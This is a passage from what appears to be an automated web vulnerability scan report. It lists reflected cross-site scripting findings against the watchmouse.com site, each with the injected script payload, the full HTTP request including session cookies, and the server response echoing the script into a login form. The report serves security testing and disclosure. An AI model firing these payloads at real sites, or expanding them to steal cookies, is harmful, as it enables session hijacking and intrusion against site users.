Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3f28ab8c1ff92a707244c29ba76cd10c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsf1fd5"><script>alert(1)</script>f3be7babcd4/ui/ui.draggable.js" method="post">
...[SNIP]...

1.48. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c82"><script>alert(1)</script>9dcf3277483 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/uid9c82"><script>alert(1)</script>9dcf3277483/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f37aabf24689396ef9308b86d0c7ffcd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/uid9c82"><script>alert(1)</script>9dcf3277483/ui.draggable.js" method="post">
...[SNIP]...

1.49. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add3d"><script>alert(1)</script>99972ef1835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.draggable.jsadd3d"><script>alert(1)</script>99972ef1835 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f81be43af20f853f8e8ea020b5b20671"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.draggable.jsadd3d"><script>alert(1)</script>99972ef1835" method="post">
...[SNIP]...

1.50. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e191"><script>alert(1)</script>1b9e196d000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets7e191"><script>alert(1)</script>1b9e196d000/js/wm.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e6109843fcc5f91be51f64ed4a9ff312"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets7e191"><script>alert(1)</script>1b9e196d000/js/wm.js" method="post">
...[SNIP]...

1.51. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55d0"><script>alert(1)</script>63d1994de38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsb55d0"><script>alert(1)</script>63d1994de38/wm.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-80104cbdf4a0750fa9c7bcb3e9867713"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsb55d0"><script>alert(1)</script>63d1994de38/wm.js" method="post">
...[SNIP]...

1.52. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcbe1"><script>alert(1)</script>71c5a05fb39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/wm.jsbcbe1"><script>alert(1)</script>71c5a05fb39 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-5c94cf5661d033a0d182423b19d4cf74"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/wm.jsbcbe1"><script>alert(1)</script>71c5a05fb39" method="post">
...[SNIP]...

1.53. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c8e8"><script>alert(1)</script>09f388dda2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets8c8e8"><script>alert(1)</script>09f388dda2d/w3c/p3p.xml HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-dde0dca617f3cc607c8c2b7267f44b5c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets8c8e8"><script>alert(1)</script>09f388dda2d/w3c/p3p.xml" method="post">
...[SNIP]...

1.54. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9d2"><script>alert(1)</script>ae73e160242 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/w3cdd9d2"><script>alert(1)</script>ae73e160242/p3p.xml HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:04 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9e7acfc070962e5c79c83e3ea7c129d6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/w3cdd9d2"><script>alert(1)</script>ae73e160242/p3p.xml" method="post">
...[SNIP]...

1.55. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af689"><script>alert(1)</script>bb6f803617a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/w3c/p3p.xmlaf689"><script>alert(1)</script>bb6f803617a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-525207aa4400ec19b8b97807565b4bdf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/w3c/p3p.xmlaf689"><script>alert(1)</script>bb6f803617a" method="post">
...[SNIP]...

1.56. http://www.watchmouse.com/chat.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /chat.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e089"><script>alert(1)</script>29c47b881dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /chat.php1e089"><script>alert(1)</script>29c47b881dd HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b655026f2a7a50b943cec4c2a51e68f4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/chat.php1e089"><script>alert(1)</script>29c47b881dd" method="post">
...[SNIP]...

1.57. http://www.watchmouse.com/de/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9192"><script>alert(1)</script>1f1c7aad21b was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1f9192"><script>alert(1)</script>1f1c7aad21b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-2a296d48f3e1c338fa1ae7efd966292c"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1f9192"><script>alert(1)</script>1f1c7aad21b" method="post">
...[SNIP]...

1.58. http://www.watchmouse.com/de/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee32d"><script>alert(1)</script>e458848d283 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /deee32d"><script>alert(1)</script>e458848d283/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-85773b95d2864b6570355fc42dbd9f01"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/deee32d"><script>alert(1)</script>e458848d283/" method="post">
...[SNIP]...

1.59. http://www.watchmouse.com/de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e97e"><script>alert(1)</script>dfef8dfc3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/?8e97e"><script>alert(1)</script>dfef8dfc3c2=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-26a6a2ac297c81238f4b123e18021f1f"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/?8e97e"><script>alert(1)</script>dfef8dfc3c2=1" method="post">
...[SNIP]...

1.60. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ce"><script>alert(1)</script>9d6c19c90c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

